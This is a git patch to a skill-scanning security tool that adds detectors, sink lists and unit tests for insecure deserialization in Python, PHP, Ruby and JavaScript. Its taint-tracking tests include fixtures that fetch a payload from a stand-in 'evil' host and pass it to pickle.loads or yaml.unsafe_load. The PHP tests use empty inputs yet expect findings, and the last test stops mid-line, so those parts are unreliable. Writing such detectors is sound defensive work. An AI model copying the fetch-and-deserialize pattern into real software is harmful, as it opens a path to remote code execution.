From 393942f8c2b626e0354e28309ce331e87dd9014d Mon Sep 17 00:00:00 2001 From: Ram Dwivedi Date: Wed, 1 Jul 2026 02:44:26 -0400 Subject: [PATCH] feat(analyzer): detect insecure deserialization (AST10, TT6, DS1-DS4) Closes the insecure-deserialization gap (OWASP ASI05 - Unexpected Code Execution) across the analyzer stack: - behavioral_ast (AST10): flags pickle / marshal / dill / jsonpickle / joblib / pandas.read_pickle, plus argument-aware yaml.load, torch.load, and numpy.load so the hardened forms (SafeLoader, weights_only=True, default allow_pickle=False) are not false-positived. - behavioral_taint_tracking (TT6): external or file input -> deserialization sink, the RCE-class flow analogue of TT5. - static_patterns_deserialization (DS1-DS4): language-gated regex breadth for the non-Python scripts a skill may bundle (PHP unserialize, Ruby Marshal/YAML/Oj, JS node-serialize/funcster). Registers the new analyzer node, adds rule metadata (explanations, remediations, category, pattern names), and ships unit tests for all rules including hardened-form and language-gating negative cases. Co-Authored-By: Claude Opus 4.8 (1M context) Signed-off-by: Ram Dwivedi --- src/skillspector/nodes/analyzers/__init__.py | 5 + .../nodes/analyzers/behavioral_ast.py | 85 ++++++++++ .../analyzers/behavioral_taint_tracking.py | 34 +++- .../nodes/analyzers/pattern_defaults.py | 29 ++++ .../static_patterns_deserialization.py | 152 ++++++++++++++++++ tests/nodes/analyzers/test_behavioral_ast.py | 91 +++++++++++ .../test_behavioral_taint_tracking.py | 41 +++++ tests/nodes/analyzers/test_registry.py | 3 +- .../test_static_patterns_deserialization.py | 103 ++++++++++++ 9 files changed, 541 insertions(+), 2 deletions(-) create mode 100644 src/skillspector/nodes/analyzers/static_patterns_deserialization.py create mode 100644 tests/nodes/analyzers/test_static_patterns_deserialization.py diff --git a/src/skillspector/nodes/analyzers/__init__.py b/src/skillspector/nodes/analyzers/__init__.py index b2ef9bcf..bf7d76b9 100644 --- a/src/skillspector/nodes/analyzers/__init__.py +++ b/src/skillspector/nodes/analyzers/__init__.py @@ -42,6 +42,9 @@ from skillspector.nodes.analyzers.static_patterns_data_exfiltration import ( node as static_patterns_data_exfiltration_node, ) +from skillspector.nodes.analyzers.static_patterns_deserialization import ( + node as static_patterns_deserialization_node, +) from skillspector.nodes.analyzers.static_patterns_excessive_agency import ( node as static_patterns_excessive_agency_node, ) @@ -92,6 +95,7 @@ "static_patterns_agent_snooping", "static_patterns_anti_refusal", "static_patterns_ssrf", + "static_patterns_deserialization", "static_yara", "behavioral_ast", "behavioral_taint_tracking", @@ -118,6 +122,7 @@ "static_patterns_agent_snooping": static_patterns_agent_snooping_node, "static_patterns_anti_refusal": static_patterns_anti_refusal_node, "static_patterns_ssrf": static_patterns_ssrf_node, + "static_patterns_deserialization": static_patterns_deserialization_node, "static_yara": static_yara_node, "behavioral_ast": behavioral_ast_node, "behavioral_taint_tracking": behavioral_taint_tracking_node, diff --git a/src/skillspector/nodes/analyzers/behavioral_ast.py b/src/skillspector/nodes/analyzers/behavioral_ast.py index e571c57a..b9a560e5 100644 --- a/src/skillspector/nodes/analyzers/behavioral_ast.py +++ b/src/skillspector/nodes/analyzers/behavioral_ast.py @@ -84,6 +84,34 @@ } ) +# Deserializers that reconstruct arbitrary objects (or execute code) from their +# input, regardless of arguments. Feeding attacker-controlled bytes to any of +# these is equivalent to code execution: pickle invokes ``__reduce__`` during +# unpickling, ``yaml.unsafe_load`` constructs arbitrary Python objects, etc. +# ``yaml.load``/``torch.load``/``numpy.load`` are handled separately because +# their safety depends on arguments (see ``_deserialization_message``). +_DESERIALIZATION_SINKS = frozenset( + { + "pickle.load", + "pickle.loads", + "cPickle.load", + "cPickle.loads", + "_pickle.load", + "_pickle.loads", + "marshal.load", + "marshal.loads", + "dill.load", + "dill.loads", + "jsonpickle.decode", + "pandas.read_pickle", + "joblib.load", + "yaml.unsafe_load", + } +) + +# Loader classes that make ``yaml.load`` safe (no arbitrary object construction). +_SAFE_YAML_LOADERS = frozenset({"SafeLoader", "CSafeLoader", "BaseLoader"}) + _RULE_MESSAGES: dict[str, str] = { "AST1": "exec() call detected", "AST2": "eval() call detected", @@ -94,6 +122,7 @@ "AST7": "Dynamic attribute access via getattr()", "AST8": "Dangerous execution chain", "AST9": "Reflective dangerous call via getattr() with a literal sink name", + "AST10": "Insecure deserialization of untrusted data", } _RULE_SEVERITIES: dict[str, Severity] = { @@ -106,6 +135,7 @@ "AST7": Severity.LOW, "AST8": Severity.CRITICAL, "AST9": Severity.HIGH, + "AST10": Severity.MEDIUM, } _RULE_CONFIDENCES: dict[str, float] = { @@ -118,6 +148,7 @@ "AST7": 0.50, "AST8": 0.95, "AST9": 0.85, + "AST10": 0.70, } _TAG = "Dangerous Code Execution" @@ -148,6 +179,57 @@ def _contains_dangerous_source(node: ast.AST, aliases: dict[str, str] | None = N return None +def _loader_arg_name(node: ast.expr) -> str | None: + """Return the trailing name of a yaml ``Loader`` argument (``yaml.SafeLoader`` → 'SafeLoader').""" + if isinstance(node, ast.Attribute): + return node.attr + if isinstance(node, ast.Name): + return node.id + return None + + +def _kwarg_is_true(node: ast.Call, name: str) -> bool: + """True if keyword *name* is passed as a literal ``True``.""" + return any( + kw.arg == name and isinstance(kw.value, ast.Constant) and kw.value.value is True + for kw in node.keywords + ) + + +def _deserialization_message(call_name: str, node: ast.Call) -> str | None: + """Return an AST10 message if *node* is an unsafe deserialization call, else None. + + ``_DESERIALIZATION_SINKS`` are unconditionally unsafe. ``yaml.load``, ``torch.load``, + and ``numpy.load`` are argument-dependent: an explicit safe ``Loader``, + ``weights_only=True``, or the default ``allow_pickle=False`` respectively make them + safe and must not be flagged (avoids false positives on the hardened forms). + """ + if call_name in _DESERIALIZATION_SINKS: + return f"Insecure deserialization: {call_name}()" + if call_name == "yaml.load": + for kw in node.keywords: + if kw.arg == "Loader": + if _loader_arg_name(kw.value) in _SAFE_YAML_LOADERS: + return None + return "Insecure deserialization: yaml.load() with an unsafe Loader" + if len(node.args) >= 2 and _loader_arg_name(node.args[1]) in _SAFE_YAML_LOADERS: + return None + return "Insecure deserialization: yaml.load() without SafeLoader" + if call_name == "torch.load": + return ( + None + if _kwarg_is_true(node, "weights_only") + else ("Insecure deserialization: torch.load() without weights_only=True") + ) + if call_name == "numpy.load": + return ( + "Insecure deserialization: numpy.load(allow_pickle=True)" + if _kwarg_is_true(node, "allow_pickle") + else None + ) + return None + + def _analyze_python(content: str, file_path: str) -> list[AnalyzerFinding]: try: tree = ast.parse(content, filename=file_path) @@ -223,6 +305,9 @@ def _emit( if attr in _OS_EXEC_CALLS: _emit("AST5", lineno, end_lineno) + elif (deser_msg := _deserialization_message(call_name, ast_node)) is not None: + _emit("AST10", lineno, end_lineno, deser_msg) + elif call_name == "getattr" and len(ast_node.args) >= 2: second_arg = ast_node.args[1] if not isinstance(second_arg, ast.Constant): diff --git a/src/skillspector/nodes/analyzers/behavioral_taint_tracking.py b/src/skillspector/nodes/analyzers/behavioral_taint_tracking.py index f6141337..5afad06e 100644 --- a/src/skillspector/nodes/analyzers/behavioral_taint_tracking.py +++ b/src/skillspector/nodes/analyzers/behavioral_taint_tracking.py @@ -134,7 +134,32 @@ } ) -_ALL_SINKS = _NETWORK_OUTPUT_SINKS | _EXEC_SINKS | _FILE_WRITE_SINKS +# Deserializers that reconstruct arbitrary objects / execute code on their input. +# When untrusted data (network, user, or a bundled/downloaded file) reaches one of +# these, it is an RCE-class flow — the deserialization analogue of _EXEC_SINKS. +# Only unconditionally-unsafe names are listed; argument-dependent forms +# (yaml.load / torch.load / numpy.load) are handled by behavioral_ast (AST10) where +# keyword arguments can be inspected without false positives on the hardened forms. +_DESERIALIZATION_SINKS = frozenset( + { + "pickle.load", + "pickle.loads", + "cPickle.load", + "cPickle.loads", + "_pickle.load", + "_pickle.loads", + "marshal.load", + "marshal.loads", + "dill.load", + "dill.loads", + "jsonpickle.decode", + "pandas.read_pickle", + "joblib.load", + "yaml.unsafe_load", + } +) + +_ALL_SINKS = _NETWORK_OUTPUT_SINKS | _EXEC_SINKS | _FILE_WRITE_SINKS | _DESERIALIZATION_SINKS # Pre-computed for _pick_rule — avoids rebuilding the union on every call. _EXTERNAL_INPUT_SOURCES = _NETWORK_INPUT_SOURCES | _USER_INPUT_SOURCES @@ -145,6 +170,7 @@ "TT3": Severity.CRITICAL, "TT4": Severity.HIGH, "TT5": Severity.CRITICAL, + "TT6": Severity.HIGH, } _RULE_CONFIDENCES: dict[str, float] = { @@ -153,6 +179,7 @@ "TT3": 0.90, "TT4": 0.80, "TT5": 0.90, + "TT6": 0.85, } _TAG = "Data Flow" @@ -168,6 +195,7 @@ (_NETWORK_OUTPUT_SINKS, "network output"), (_EXEC_SINKS, "code execution"), (_FILE_WRITE_SINKS, "file write"), + (_DESERIALIZATION_SINKS, "deserialization"), ] @@ -204,6 +232,10 @@ def _pick_rule(source_name: str, sink_name: str, is_direct: bool) -> str: return "TT4" if source_name in _EXTERNAL_INPUT_SOURCES and sink_name in _EXEC_SINKS: return "TT5" + if sink_name in _DESERIALIZATION_SINKS and ( + source_name in _EXTERNAL_INPUT_SOURCES or source_name in _FILE_READ_SOURCES + ): + return "TT6" return "TT1" if is_direct else "TT2" diff --git a/src/skillspector/nodes/analyzers/pattern_defaults.py b/src/skillspector/nodes/analyzers/pattern_defaults.py index 437ad39e..b5bde4d6 100644 --- a/src/skillspector/nodes/analyzers/pattern_defaults.py +++ b/src/skillspector/nodes/analyzers/pattern_defaults.py @@ -41,6 +41,7 @@ class PatternCategory(StrEnum): AGENT_SNOOPING = "Agent Snooping" ANTI_REFUSAL = "Anti-Refusal" SERVER_SIDE_REQUEST_FORGERY = "Server-Side Request Forgery" + DESERIALIZATION = "Insecure Deserialization" # Pattern-specific explanations (why the finding is dangerous) @@ -100,6 +101,7 @@ class PatternCategory(StrEnum): "TT3": "Credentials or environment variables flow to a network sink. This is a high-confidence indicator of credential exfiltration.", "TT4": "File contents flow to a network sink. This may indicate data exfiltration of sensitive files.", "TT5": "External input (network, user) flows to a code execution sink. This enables remote code execution or command injection.", + "TT6": "External input or file contents flow to an insecure deserializer (pickle, marshal, dill, jsonpickle, joblib, yaml.unsafe_load). Deserializing untrusted data reconstructs arbitrary objects and enables remote code execution.", # Behavioral AST (B.2.1) "AST1": "Direct exec() call allows arbitrary code execution. An attacker can inject code that runs with the full privileges of the process.", "AST2": "Direct eval() call evaluates arbitrary expressions. This can be exploited to execute malicious code or exfiltrate data.", @@ -110,6 +112,7 @@ class PatternCategory(StrEnum): "AST7": "Dynamic getattr() with a non-literal attribute name can access arbitrary object attributes, potentially bypassing access controls.", "AST8": "A dangerous execution chain combines code execution (exec/eval) with a dynamic source (network, encoded data, dynamic import), creating a high-confidence attack vector.", "AST9": "Reflective access to an execution sink via getattr() with a constant name (e.g. getattr(os, 'system'), getattr(builtins, 'exec')) is functionally identical to a direct exec/os.system call but evades name-based detection. This is a deliberate evasion technique rather than idiomatic code.", + "AST10": "Untrusted data is passed to an insecure deserializer (pickle, marshal, dill, jsonpickle, joblib, yaml.load without a safe Loader, or torch.load without weights_only). These deserializers reconstruct arbitrary objects and invoke callables during loading, so deserializing attacker-controlled bytes is equivalent to arbitrary code execution.", # YARA (B.1.12) "YR1": "YARA rule matched a known malware signature (reverse shell, backdoor, ransomware, C2 framework, or info stealer).", "YR2": "YARA rule matched a known webshell pattern (PHP, Python, JSP, or ASPX webshell).", @@ -137,6 +140,11 @@ class PatternCategory(StrEnum): "SSRF1": "Code accesses a cloud instance metadata endpoint (e.g. 169.254.169.254). A single request can return temporary IAM credentials, making this a high-value SSRF target for credential theft.", "SSRF2": "Code issues a request to a loopback, link-local, or private-range host. This can reach internal services not meant to be exposed and is a common SSRF pivot.", "SSRF3": "Request target host is built from a dynamic or untrusted value. If the host is attacker-influenced, this enables SSRF to arbitrary internal or metadata endpoints.", + # Insecure Deserialization (multi-language) + "DS1": "PHP unserialize() on untrusted input enables object injection: crafted serialized data instantiates arbitrary classes and triggers magic methods (__wakeup/__destruct), leading to POP-chain code execution.", + "DS2": "Ruby Marshal.load / Marshal.restore reconstructs arbitrary objects from a binary blob. On attacker-controlled input this is a well-known remote code execution vector.", + "DS3": "Ruby YAML.load / Psych.load / Oj.load (in object mode) can instantiate arbitrary Ruby objects from untrusted YAML/JSON, enabling code execution. Use YAML.safe_load or Psych.safe_load instead.", + "DS4": "JavaScript deserialization via node-serialize/funcster/serialize-to-js evaluates embedded functions (the _$$ND_FUNC$$_ marker), so unserializing attacker input executes arbitrary code in the Node process.", } # Rule ID -> category (for report output) @@ -187,6 +195,7 @@ class PatternCategory(StrEnum): "TT3": PatternCategory.DATA_EXFILTRATION.value, "TT4": PatternCategory.DATA_EXFILTRATION.value, "TT5": PatternCategory.PRIVILEGE_ESCALATION.value, + "TT6": PatternCategory.DESERIALIZATION.value, # YARA (B.1.12) "YR1": PatternCategory.YARA_MATCH.value, "YR2": PatternCategory.YARA_MATCH.value, @@ -214,6 +223,11 @@ class PatternCategory(StrEnum): "SSRF1": PatternCategory.SERVER_SIDE_REQUEST_FORGERY.value, "SSRF2": PatternCategory.SERVER_SIDE_REQUEST_FORGERY.value, "SSRF3": PatternCategory.SERVER_SIDE_REQUEST_FORGERY.value, + # Insecure Deserialization (multi-language) + "DS1": PatternCategory.DESERIALIZATION.value, + "DS2": PatternCategory.DESERIALIZATION.value, + "DS3": PatternCategory.DESERIALIZATION.value, + "DS4": PatternCategory.DESERIALIZATION.value, } # Rule ID -> pattern display name (for report output) @@ -291,6 +305,14 @@ class PatternCategory(StrEnum): "SSRF1": "Cloud Metadata Access", "SSRF2": "Internal Network Request", "SSRF3": "Dynamic Request Target", + # Behavioral AST / Taint deserialization + "AST10": "Insecure Deserialization", + "TT6": "Untrusted Data to Deserializer Flow", + # Insecure Deserialization (multi-language) + "DS1": "PHP Object Injection", + "DS2": "Ruby Marshal Deserialization", + "DS3": "Unsafe Ruby YAML Deserialization", + "DS4": "Unsafe JavaScript Deserialization", } # Pattern-specific remediations (how to fix the issue) @@ -354,12 +376,14 @@ class PatternCategory(StrEnum): "AST7": "Replace dynamic getattr() with explicit attribute access or a dictionary lookup with an allowlist of permitted attributes.", "AST8": "Remove the execution chain entirely. Never pass network data, decoded bytes, or dynamically imported code to exec()/eval(). Use structured data formats instead.", "AST9": "Call the function directly instead of reflectively (write exec(...) / os.system(...) explicitly), or remove it. If reflection is genuinely required, restrict it to an allowlist of safe attribute names that excludes execution sinks.", + "AST10": "Never deserialize untrusted input with pickle/marshal/dill/jsonpickle/joblib. Use a data-only format such as JSON. For YAML use yaml.safe_load; for PyTorch use torch.load(..., weights_only=True); for numpy avoid allow_pickle=True. If a binary format is unavoidable, verify an HMAC/signature over the bytes before loading.", # Behavioral Taint Tracking (B.2.2) "TT1": "Add validation or sanitization between the data source and sink. Never pass raw source data directly to a sink without checking its content.", "TT2": "Validate tainted variables before passing them to sinks. Use allowlists, type checks, or sanitization functions on data from external sources.", "TT3": "Never send credentials or environment variables over the network. Use secure credential stores and avoid transmitting secrets in request bodies or URLs.", "TT4": "Validate and filter file contents before sending over the network. Ensure sensitive files (credentials, configs) are never transmitted to external endpoints.", "TT5": "Never pass external input to exec(), eval(), os.system(), or subprocess without strict validation. Use allowlists and parameterized commands instead.", + "TT6": "Do not deserialize external input or bundled/downloaded files with pickle/marshal/dill/jsonpickle/joblib/yaml.unsafe_load. Use JSON or another data-only format, and verify integrity (HMAC/signature) before loading any binary blob.", # YARA (B.1.12) "YR1": "Remove the malware payload or compromised file entirely. Investigate how it entered the skill and audit all other artifacts for additional indicators of compromise.", "YR2": "Remove the webshell code immediately. Webshells provide unauthorized remote command execution. Audit the skill for additional backdoors or persistence mechanisms.", @@ -387,6 +411,11 @@ class PatternCategory(StrEnum): "SSRF1": "Remove access to cloud metadata endpoints unless strictly required. If metadata is needed, restrict it (e.g. IMDSv2 with hop limit) and never expose returned credentials.", "SSRF2": "Avoid requests to loopback/link-local/private hosts from skill code. If internal access is intended, document it and validate the target against an allowlist.", "SSRF3": "Do not build request URLs from untrusted input. Validate the host against an allowlist and reject internal/metadata addresses before issuing the request.", + # Insecure Deserialization (multi-language) + "DS1": "Avoid unserialize() on untrusted PHP input. Use json_decode() for data, or restrict allowed classes via the second argument: unserialize($data, ['allowed_classes' => false]).", + "DS2": "Never call Marshal.load/Marshal.restore on untrusted data. Use JSON.parse for data exchange; Marshal is only safe for data you produced and trust.", + "DS3": "Replace YAML.load/Psych.load with YAML.safe_load (or Psych.safe_load) and pass an explicit permitted-classes allowlist. For Oj, avoid :object mode on untrusted input.", + "DS4": "Do not use node-serialize/funcster/serialize-to-js to deserialize untrusted input. Use JSON.parse for data, which never executes embedded code.", } diff --git a/src/skillspector/nodes/analyzers/static_patterns_deserialization.py b/src/skillspector/nodes/analyzers/static_patterns_deserialization.py new file mode 100644 index 00000000..66f1e4b1 --- /dev/null +++ b/src/skillspector/nodes/analyzers/static_patterns_deserialization.py @@ -0,0 +1,152 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026 NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +"""Static patterns: insecure deserialization across languages (DS1–DS4). + +Python deserialization is detected with AST/taint precision by ``behavioral_ast`` +(AST10) and ``behavioral_taint_tracking`` (TT6). This module provides *breadth* for +the non-Python scripts a skill may bundle (PHP, Ruby, and JavaScript/TypeScript) via +language-gated regex signatures. Matching is anchored to each language's dangerous +deserializer so a signature only runs against files of that language, keeping false +positives low. Node and analyze() live in one module. +""" + +from __future__ import annotations + +import re +import sys + +from skillspector.logging_config import get_logger +from skillspector.models import AnalyzerFinding, Location, Severity +from skillspector.state import AnalyzerNodeResponse, SkillspectorState + +from . import static_runner +from .common import get_context, get_line_number +from .pattern_defaults import PatternCategory + +logger = get_logger(__name__) + +ANALYZER_ID = "static_patterns_deserialization" + +# File extension -> language. Python is intentionally excluded: it is covered with +# AST/taint precision by behavioral_ast (AST10) and behavioral_taint_tracking (TT6), +# so scanning it here too would only produce duplicate, lower-quality findings. +_LANG_BY_EXT: dict[str, str] = { + ".php": "php", + ".php3": "php", + ".php4": "php", + ".php5": "php", + ".phtml": "php", + ".rb": "ruby", + ".rake": "ruby", + ".js": "javascript", + ".mjs": "javascript", + ".cjs": "javascript", + ".jsx": "javascript", + ".ts": "javascript", + ".tsx": "javascript", +} + +# language -> [(rule_id, message, severity, [(regex, confidence), ...]), ...] +_LANG_RULES: dict[str, list[tuple[str, str, Severity, list[tuple[str, float]]]]] = { + "php": [ + ( + "DS1", + "PHP object injection via unserialize()", + Severity.HIGH, + [(r"\bunserialize\s*\(", 0.8)], + ), + ], + "ruby": [ + ( + "DS2", + "Ruby Marshal deserialization of untrusted data", + Severity.HIGH, + [(r"\bMarshal\s*\.\s*(?:load|restore)\b", 0.85)], + ), + ( + "DS3", + "Unsafe Ruby YAML/Oj deserialization", + Severity.MEDIUM, + [ + (r"\b(?:YAML|Psych)\s*\.\s*load\s*\(", 0.65), + (r"\bOj\s*\.\s*load\s*\(", 0.6), + ], + ), + ], + "javascript": [ + ( + "DS4", + "Unsafe JavaScript deserialization (node-serialize/funcster)", + Severity.HIGH, + [ + (r"""require\(\s*['"]node-serialize['"]\s*\)""", 0.75), + (r"""require\(\s*['"]serialize-to-js['"]\s*\)""", 0.7), + (r"\bfuncster\b", 0.6), + (r"\.unserialize\s*\(", 0.6), + ], + ), + ], +} + +# Pre-compiled: language -> [(rule_id, message, severity, compiled_regex, confidence), ...] +_COMPILED: dict[str, list[tuple[str, str, Severity, re.Pattern[str], float]]] = { + language: [ + (rule_id, message, severity, re.compile(pattern, re.IGNORECASE), confidence) + for rule_id, message, severity, patterns in rules + for pattern, confidence in patterns + ] + for language, rules in _LANG_RULES.items() +} + + +def _language_for(file_path: str) -> str | None: + """Map a file path to a supported language by extension, or None.""" + idx = file_path.rfind(".") + if idx < 0: + return None + return _LANG_BY_EXT.get(file_path[idx:].lower()) + + +def analyze(content: str, file_path: str, file_type: str) -> list[AnalyzerFinding]: + """Detect insecure deserialization signatures in non-Python skill scripts (DS1–DS4).""" + language = _language_for(file_path) + if language is None: + return [] + tag = [PatternCategory.DESERIALIZATION.value] + findings: list[AnalyzerFinding] = [] + for rule_id, message, severity, regex, confidence in _COMPILED[language]: + for match in regex.finditer(content): + line_num = get_line_number(content, match.start()) + findings.append( + AnalyzerFinding( + rule_id=rule_id, + message=message, + severity=severity, + location=Location(file=file_path, start_line=line_num), + confidence=confidence, + tags=tag, + context=get_context(content, match.start()), + matched_text=match.group(0)[:200], + ) + ) + return findings + + +def node(state: SkillspectorState) -> AnalyzerNodeResponse: + """Run multi-language deserialization patterns and return findings.""" + findings = static_runner.run_static_patterns(state, [sys.modules[__name__]]) + logger.info("%s: %d findings", ANALYZER_ID, len(findings)) + return {"findings": findings} diff --git a/tests/nodes/analyzers/test_behavioral_ast.py b/tests/nodes/analyzers/test_behavioral_ast.py index ae1a4231..d79d36bb 100644 --- a/tests/nodes/analyzers/test_behavioral_ast.py +++ b/tests/nodes/analyzers/test_behavioral_ast.py @@ -187,6 +187,97 @@ def test_exec_import_chain_produces_ast8(self): assert len(ast8) >= 1 +class TestInsecureDeserialization: + """AST10: deserializers that reconstruct arbitrary objects / execute code.""" + + def test_pickle_loads_produces_ast10(self): + findings = _run("import pickle\nobj = pickle.loads(data)") + ast10 = [f for f in findings if f.rule_id == "AST10"] + assert len(ast10) == 1 + assert ast10[0].severity == "MEDIUM" + assert "pickle.loads" in ast10[0].message + + def test_pickle_load_produces_ast10(self): + findings = _run('import pickle\nobj = pickle.load(open("f.pkl", "rb"))') + assert any(f.rule_id == "AST10" for f in findings) + + def test_marshal_loads_produces_ast10(self): + findings = _run("import marshal\nmarshal.loads(blob)") + assert any(f.rule_id == "AST10" for f in findings) + + def test_dill_loads_produces_ast10(self): + findings = _run("import dill\ndill.loads(blob)") + assert any(f.rule_id == "AST10" for f in findings) + + def test_jsonpickle_decode_produces_ast10(self): + findings = _run("import jsonpickle\njsonpickle.decode(s)") + assert any(f.rule_id == "AST10" for f in findings) + + def test_pandas_read_pickle_produces_ast10(self): + findings = _run('import pandas as pd\ndf = pd.read_pickle("data.pkl")') + assert any(f.rule_id == "AST10" for f in findings) + + def test_joblib_load_produces_ast10(self): + findings = _run('import joblib\nm = joblib.load("model.pkl")') + assert any(f.rule_id == "AST10" for f in findings) + + def test_yaml_unsafe_load_produces_ast10(self): + findings = _run("import yaml\nyaml.unsafe_load(s)") + assert any(f.rule_id == "AST10" for f in findings) + + def test_from_import_alias_evasion(self): + findings = _run("from pickle import loads\nloads(blob)") + assert any(f.rule_id == "AST10" for f in findings) + + # ── yaml.load: argument-aware ───────────────────────────────────── + + def test_yaml_load_without_loader_produces_ast10(self): + findings = _run("import yaml\nyaml.load(s)") + assert any(f.rule_id == "AST10" for f in findings) + + def test_yaml_load_with_safe_loader_kwarg_no_finding(self): + findings = _run("import yaml\nyaml.load(s, Loader=yaml.SafeLoader)") + assert not any(f.rule_id == "AST10" for f in findings) + + def test_yaml_load_with_safe_loader_positional_no_finding(self): + findings = _run("import yaml\nyaml.load(s, yaml.SafeLoader)") + assert not any(f.rule_id == "AST10" for f in findings) + + def test_yaml_load_with_unsafe_loader_produces_ast10(self): + findings = _run("import yaml\nyaml.load(s, Loader=yaml.FullLoader)") + assert any(f.rule_id == "AST10" for f in findings) + + def test_yaml_safe_load_no_finding(self): + findings = _run("import yaml\nyaml.safe_load(s)") + assert not any(f.rule_id == "AST10" for f in findings) + + # ── torch.load: argument-aware ──────────────────────────────────── + + def test_torch_load_without_weights_only_produces_ast10(self): + findings = _run('import torch\ntorch.load("model.pt")') + assert any(f.rule_id == "AST10" for f in findings) + + def test_torch_load_with_weights_only_no_finding(self): + findings = _run('import torch\ntorch.load("model.pt", weights_only=True)') + assert not any(f.rule_id == "AST10" for f in findings) + + # ── numpy.load: argument-aware ──────────────────────────────────── + + def test_numpy_load_default_no_finding(self): + findings = _run('import numpy as np\nnp.load("arr.npy")') + assert not any(f.rule_id == "AST10" for f in findings) + + def test_numpy_load_allow_pickle_produces_ast10(self): + findings = _run('import numpy as np\nnp.load("arr.npy", allow_pickle=True)') + assert any(f.rule_id == "AST10" for f in findings) + + # ── no false positives on safe data parsing ─────────────────────── + + def test_json_loads_no_finding(self): + findings = _run("import json\njson.loads('{}')") + assert not any(f.rule_id == "AST10" for f in findings) + + class TestEdgeCases: def test_non_python_files_skipped(self): state = { diff --git a/tests/nodes/analyzers/test_behavioral_taint_tracking.py b/tests/nodes/analyzers/test_behavioral_taint_tracking.py index 699396be..d0b24817 100644 --- a/tests/nodes/analyzers/test_behavioral_taint_tracking.py +++ b/tests/nodes/analyzers/test_behavioral_taint_tracking.py @@ -133,6 +133,47 @@ def test_network_to_subprocess(self): assert len(tt5) >= 1 +# ── TT6: External / file input → deserialization sink ────────────────── + + +class TestUntrustedDeserialization: + def test_network_to_pickle_loads(self): + code = ( + "import requests, pickle\n" + 'blob = requests.get("http://evil/payload").content\n' + "obj = pickle.loads(blob)\n" + ) + findings = _run(code) + tt6 = [f for f in findings if f.rule_id == "TT6"] + assert len(tt6) >= 1 + assert tt6[0].severity == "HIGH" + assert "deserialization" in tt6[0].message + + def test_file_read_to_pickle_load(self): + code = 'import pickle\nobj = pickle.load(open("bundled.pkl", "rb"))\n' + findings = _run(code) + assert any(f.rule_id == "TT6" for f in findings) + + def test_user_input_to_pickle_loads(self): + code = "import pickle\npickle.loads(input())\n" + findings = _run(code) + assert any(f.rule_id == "TT6" for f in findings) + + def test_network_to_yaml_unsafe_load(self): + code = ( + "import requests, yaml\n" + 'data = requests.get("http://evil").text\n' + "yaml.unsafe_load(data)\n" + ) + findings = _run(code) + assert any(f.rule_id == "TT6" for f in findings) + + def test_constant_argument_no_tt6(self): + code = 'import pickle\npickle.loads(b"\\x80\\x04constant")\n' + findings = _run(code) + assert not any(f.rule_id == "TT6" for f in findings) + + # ── TT1: Direct source-to-sink (generic) ─────────────────────────────── diff --git a/tests/nodes/analyzers/test_registry.py b/tests/nodes/analyzers/test_registry.py index 6fef06a5..ca5e3739 100644 --- a/tests/nodes/analyzers/test_registry.py +++ b/tests/nodes/analyzers/test_registry.py @@ -20,7 +20,7 @@ from skillspector.nodes.analyzers import ANALYZER_NODE_IDS, ANALYZER_NODES # Expected analyzer node IDs per the workflow reference table. -# Order: static (14), behavioral (2), mcp (3), semantic (3). +# Order: static (15), behavioral (2), mcp (3), semantic (3). EXPECTED_ANALYZER_NODE_IDS: list[str] = [ "static_patterns_prompt_injection", "static_patterns_data_exfiltration", @@ -36,6 +36,7 @@ "static_patterns_agent_snooping", "static_patterns_anti_refusal", "static_patterns_ssrf", + "static_patterns_deserialization", "static_yara", "behavioral_ast", "behavioral_taint_tracking", diff --git a/tests/nodes/analyzers/test_static_patterns_deserialization.py b/tests/nodes/analyzers/test_static_patterns_deserialization.py new file mode 100644 index 00000000..c0e319c9 --- /dev/null +++ b/tests/nodes/analyzers/test_static_patterns_deserialization.py @@ -0,0 +1,103 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026 NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +"""Tests for static_patterns_deserialization: multi-language deserialization (DS1–DS4).""" + +from __future__ import annotations + +from skillspector.nodes.analyzers import static_patterns_deserialization + + +def _run(code: str, filename: str) -> list: + state = { + "components": [filename], + "file_cache": {filename: code}, + } + return static_patterns_deserialization.node(state)["findings"] + + +class TestPHP: + def test_unserialize_produces_ds1(self): + findings = _run("", "exploit.php") + ds1 = [f for f in findings if f.rule_id == "DS1"] + assert len(ds1) == 1 + assert ds1[0].severity == "HIGH" + + def test_clean_php_no_finding(self): + findings = _run("", "clean.php") + assert not any(f.rule_id == "DS1" for f in findings) + + +class TestRuby: + def test_marshal_load_produces_ds2(self): + findings = _run("data = Marshal.load(untrusted_blob)\n", "loader.rb") + assert any(f.rule_id == "DS2" for f in findings) + + def test_marshal_restore_produces_ds2(self): + findings = _run("data = Marshal.restore(untrusted_blob)\n", "loader.rb") + assert any(f.rule_id == "DS2" for f in findings) + + def test_yaml_load_produces_ds3(self): + findings = _run("obj = YAML.load(params[:payload])\n", "config.rb") + assert any(f.rule_id == "DS3" for f in findings) + + def test_oj_load_produces_ds3(self): + findings = _run("obj = Oj.load(input_str)\n", "config.rb") + assert any(f.rule_id == "DS3" for f in findings) + + def test_yaml_safe_load_no_finding(self): + findings = _run("obj = YAML.safe_load(params[:payload])\n", "config.rb") + assert not any(f.rule_id == "DS3" for f in findings) + + +class TestJavaScript: + def test_node_serialize_require_produces_ds4(self): + code = "const serialize = require('node-serialize');\nserialize.unserialize(payload);\n" + findings = _run(code, "handler.js") + assert any(f.rule_id == "DS4" for f in findings) + + def test_unserialize_method_produces_ds4(self): + findings = _run("obj.unserialize(userInput);\n", "handler.ts") + assert any(f.rule_id == "DS4" for f in findings) + + def test_json_parse_no_finding(self): + findings 